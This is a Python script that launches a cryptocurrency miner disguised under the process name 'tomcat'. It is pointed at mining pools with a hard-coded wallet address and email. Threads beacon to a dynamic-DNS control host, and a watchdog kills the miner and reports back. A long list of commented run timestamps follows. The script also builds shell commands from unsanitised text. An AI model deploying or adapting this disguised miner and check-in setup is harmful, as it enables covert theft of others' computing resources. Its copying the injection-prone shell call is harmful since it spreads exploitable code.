import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:01.447432
#2018-02-17 17:10:01.591113
#2018-02-17 18:58:07.406235
#2018-02-17 20:46:07.323087
#2018-02-17 22:33:01.633237
#2018-02-18 00:17:01.806235
#2018-02-18 02:07:06.236898
#2018-02-18 03:54:01.794743
#2018-02-18 05:43:04.135830
#2018-02-18 07:36:07.756904
#2018-02-18 09:23:05.673131
#2018-02-18 11:08:06.909129
#2018-02-18 12:55:02.395358
#2018-02-18 14:42:04.296757
#2018-02-18 16:31:04.782063
#2018-02-18 18:20:07.339505
#2018-02-18 20:07:04.164191
#2018-02-18 21:53:05.752574
#2018-02-18 23:43:04.682570
#2018-02-19 01:29:04.841496
#2018-02-19 03:17:05.138793
#2018-02-19 05:02:03.967989
#2018-02-19 06:47:04.039845
#2018-02-19 08:36:07.454416
#2018-02-19 10:25:06.601604
#2018-02-19 12:13:06.999649
#2018-02-19 14:00:13.054892
#2018-02-19 15:49:06.491051
#2018-02-19 17:37:04.667816
#2018-02-19 19:26:06.974676
#2018-02-19 21:14:05.347718
#2018-02-19 23:00:01.800375
#2018-02-20 00:43:07.112046
#2018-02-20 02:35:05.702781
#2018-02-20 04:23:04.707924
#2018-02-20 06:07:06.990822
#2018-02-20 07:52:01.865095
#2018-02-20 09:37:01.843554
#2018-02-20 11:20:04.643646
#2018-02-20 13:07:01.837199
#2018-02-20 14:51:10.570117
#2018-02-20 16:38:01.351315
#2018-02-20 18:24:06.724916
#2018-02-20 20:17:06.980698
#2018-02-20 22:04:07.769218
#2018-02-20 23:45:10.556226
#2018-02-21 01:31:01.875582
#2018-02-21 03:18:04.468905
#2018-02-21 05:06:06.648576
#2018-02-21 06:54:03.885729
#2018-02-21 08:41:01.311550
#2018-02-21 10:26:04.542563
#2018-02-21 12:13:07.635672
#2018-02-21 14:02:04.291158
#2018-02-21 15:47:06.149972
#2018-02-21 17:38:06.839424
#2018-02-21 19:24:08.783895
#2018-02-21 21:11:07.957545
#2018-02-21 22:58:05.786695
#2018-02-22 00:46:05.549042
#2018-02-22 02:34:04.510685
#2018-02-22 04:20:05.605750
#2018-02-22 06:05:02.891858
#2018-02-22 07:50:05.835975
#2018-02-22 09:39:07.864048
#2018-02-22 11:25:01.454379
#2018-02-22 13:10:10.683397
#2018-02-22 15:02:04.328460
#2018-02-22 16:47:05.010016
#2018-02-22 18:33:09.686077
#2018-02-22 20:25:05.502258
#2018-02-22 22:13:05.948897
#2018-02-22 23:59:01.471248
#2018-02-23 01:48:08.368453
#2018-02-23 03:38:05.193760
#2018-02-23 05:23:03.893825
#2018-02-23 07:09:05.216571
#2018-02-23 09:14:06.997261
#2018-02-23 11:21:03.895176
#2018-02-23 13:11:07.355089
#2018-02-23 14:56:08.040184
#2018-02-23 16:46:01.815085
#2018-02-23 18:33:08.821179
#2018-02-23 20:23:06.033843
#2018-02-23 22:09:05.623987
#2018-02-23 23:56:07.339204
#2018-02-24 01:46:04.227561
#2018-02-24 03:42:07.801895
#2018-02-24 05:27:01.574348
#2018-02-24 07:14:03.975638
#2018-02-24 09:03:06.201075
#2018-02-24 10:59:04.858531
#2018-02-24 12:48:07.696337
#2018-02-24 14:37:06.727388
#2018-02-24 16:24:04.740628
#2018-02-24 18:17:05.243627
#2018-02-24 20:04:03.890449
#2018-02-24 21:46:03.800936
#2018-02-25 00:44:07.046775
#2018-02-25 04:32:01.760408
#2018-02-25 07:58:07.022982